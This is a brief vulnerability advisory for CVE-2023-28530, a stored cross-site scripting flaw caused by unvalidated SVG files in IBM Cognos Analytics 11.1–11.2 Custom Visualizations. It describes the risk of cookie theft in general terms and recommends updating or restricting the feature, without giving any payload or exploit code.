CVE-2023-28530

Name of the Vulnerable Software and Affected Versions IBM Cognos Analytics versions 11.1 through 11.2

Description The issue is caused by improper validation of SVG files in Custom Visualizations, leading to stored cross-site scripting. A remote attacker could exploit this to execute scripts in a victim's Web browser within the security context of the hosting Web site, potentially stealing the victim's cookie-based authentication credentials.

Recommendations For versions 11.1 and 11.2, update to a version that properly validates SVG files in Custom Visualizations to prevent stored cross-site scripting. As a temporary workaround, consider restricting the use of Custom Visualizations until a patch is available.